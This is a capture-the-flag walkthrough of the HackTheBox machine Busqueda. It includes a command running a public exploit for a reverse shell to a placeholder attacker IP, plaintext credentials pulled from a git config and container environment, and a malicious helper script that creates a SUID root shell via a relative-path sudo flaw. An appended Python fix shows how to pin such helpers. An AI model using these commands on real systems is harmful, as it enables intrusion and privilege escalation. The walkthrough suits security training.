Busqueda

In this write-up, we will solve a box on HackTheBox called Busqueda.
Reconnaissance
nmap
As usual, we start by scanning for open ports and the services running on them.

We find 22/tcp [SSH] and 80/tcp [HTTP].
Browsing to 80/tcp [HTTP], we are redirected to 'searcher.htb',
so let's add it to the /etc/hosts file.


Foothold as svc user
If we take a look at the web application, we find the name and version of a library in the footer.

Searching the internet for an exploit for this version, we find one.
Its README contains a guide on how to use it; first we start a listener.

Download the repository using git clone,
make sure the exploit script is executable, and then run this command:
./exploit.sh searcher.htb <ATTACKER_IP> <LISTENING_PORT>

You will get a reverse shell as the user svc.

Upgrade the shell

You will find the user flag at
/home/svc/user.txt
Looking at the web app directory, we find a git repository.

If we take a look at the config file inside it, we find two things: a new subdomain and credentials.

We have the credentials cody:jh1usoih2bkjaspwe92.
If we try them on SSH, they do not work.
We also have a subdomain, gitea.searcher.htb; let's add it to /etc/hosts.

Let's browse to the subdomain we found.

In the Gitea web application, go to Explore -> Users:
we find that there are two users, cody and administrator.

Click Sign In in the top right and try the credentials found in the config file inside .git: cody:jh1usoih2bkjaspwe92

And we are in.

If we try this password for the user svc:

So we can run sudo as the user svc.

If we run it:

So we can see which Docker container processes are running on the machine, and we can inspect each one.
Let's list the running containers:
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps *

Let's inspect the first one, but first we need to know the syntax.


We need to specify the format.
Searching Google for the docker inspect format leads us to the documentation at https://docs.docker.com/engine/reference/commandline/inspect/ where we find this:

Let's follow the link in the --format description: https://docs.docker.com/config/formatting/

According to ChatGPT,
'{{json .Mounts}}'
is a Go template expression that extracts the mount information from the Docker inspect output and formats it as JSON.
To extract all information about the container, we use '{{json .}}':
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea

For JSON formatting we use jq, since it is already present on the target machine.
If it is not there, we can copy the result into a file on the attacking machine, install jq with the command sudo apt-get -y install jq,
and then use it there.

If we scroll down, we find the Gitea DB credentials:

GITEA__database__USER=gitea
GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh

If we scroll down further, we find the MySQL DB credentials:

MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF
MYSQL_USER=gitea
MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh
MYSQL_DATABASE=gitea
Let's try these passwords to log in to the Gitea app as administrator.
The one that signs us in as administrator is yuiu1hoiu4i5ho1uh.
Now, as administrator, let's take a look at the repositories

and at the administrator/scripts repository.

These files are the ones in the /opt/scripts directory,

so now we can read them as administrator from the repository.
We discover that the system-checkup.py script does not use an absolute path when it calls full-checkup.sh.

We now leverage the relative reference to full-checkup.sh by executing the system-checkup script from another writable directory that contains our own malicious full-checkup.sh script.
We have two options for where to write our script: the /tmp directory or the /dev/shm directory.
Create the script there (nano full-checkup.sh) with the following contents:
#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash
Then, from that directory, run the system-checkup script via sudo and launch the SUID copy of bash:
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
/tmp/rootbash -p
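The root cause of this privilege escalation is a script run under sudo resolving its helper relative to the caller's working directory. As an added example (not code from the box or from the author), this is how such a maintenance script could pin the helper to a trusted directory and check its ownership and permissions before running it; /opt/scripts comes from the write-up, while the function names and the expected_uid parameter are assumptions.

```python
import os
import stat
import subprocess

# Assumed trusted home of the helper scripts; the real layout of /opt/scripts
# on the box is not shown in the write-up.
TRUSTED_DIR = "/opt/scripts"


def resolve_trusted_helper(name, trusted_dir=TRUSTED_DIR, expected_uid=0):
    """Return the absolute path of helper `name`, refusing anything that a
    low-privileged caller could influence: a name with path components, a file
    that resolves outside trusted_dir (e.g. via a symlink), a non-regular file,
    a file not owned by expected_uid, or one writable by group or others.
    The bug in the write-up was resolving "full-checkup.sh" against the CWD."""
    if not name or os.sep in name or name in (".", ".."):
        raise ValueError("helper name must be a bare filename: %r" % name)
    trusted_dir = os.path.realpath(trusted_dir)
    path = os.path.realpath(os.path.join(trusted_dir, name))
    if os.path.dirname(path) != trusted_dir:
        raise PermissionError("%s resolves outside %s" % (name, trusted_dir))
    st = os.lstat(path)  # raises FileNotFoundError if the helper is missing
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("%s is not a regular file" % path)
    if st.st_uid != expected_uid:
        raise PermissionError("%s is not owned by uid %d" % (path, expected_uid))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError("%s is group- or world-writable" % path)
    return path


def run_helper(name, trusted_dir=TRUSTED_DIR, expected_uid=0):
    """Run the vetted helper by absolute path with a fixed PATH and the working
    directory pinned to trusted_dir, so neither the caller's CWD nor their
    environment can change what gets executed with elevated privileges."""
    path = resolve_trusted_helper(name, trusted_dir, expected_uid)
    env = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"}
    return subprocess.run([path], cwd=trusted_dir, env=env,
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Succeeds only if /opt/scripts/full-checkup.sh is a root-owned,
    # non-writable regular file inside /opt/scripts; otherwise it is refused.
    try:
        print(run_helper("full-checkup.sh").stdout, end="")
    except (OSError, ValueError) as exc:  # PermissionError is an OSError
        print("refused:", exc)
```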


I hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara